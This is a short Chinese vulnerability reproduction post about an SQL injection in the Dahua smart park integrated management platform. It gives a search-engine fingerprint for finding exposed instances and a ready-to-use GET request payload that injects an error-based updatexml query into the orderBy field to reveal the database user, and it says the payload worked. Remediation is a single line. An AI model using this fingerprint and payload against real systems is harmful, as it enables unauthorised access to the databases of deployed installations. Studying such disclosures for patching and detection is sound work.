前言
此文章仅用于技术交流,严禁用于对外发起恶意攻击!!!
一、产品简介
大华智慧园区综合管理平台是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。
二、漏洞描述
由于该平台未对用户输入数据做限制,攻击者可以直接将恶意代码拼接进SQL查询语句中,导致系统出现SQL注入漏洞。
三、影响范围
未知
四、复现环境
鹰图指纹:web.body=“/WPMS/asset/lib/gridster/”
五、漏洞复现
1.访问存在漏洞的网站,抓包
2.POC:
以GET方式请求
/portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20user()),0x7e),1)--%22%7D/extend/%7B%7D
3.测试,执行成功
六、漏洞利用
后续可获得数据库信息。
七、修复建议
尽快将该系统放进内网,等待厂家修复。
参考链接
https://blog.csdn.net/qq_41904294/article/details/132220571?ops_request_misc=&request_id=&biz_id=102&utm_term=%E5%A4%A7%E5%8D%8E%E6%99%BA%E6%85%A7%E5%9B%AD%E5%8C%BA%E7%BB%BC%E5%90%88%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0publishing%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E&utm_medium=distribute.pc_search_result.none-task-blog-2allsobaiduweb~default-3-132220571.142v92insert_down28v1&spm=1018.2226.3001.4187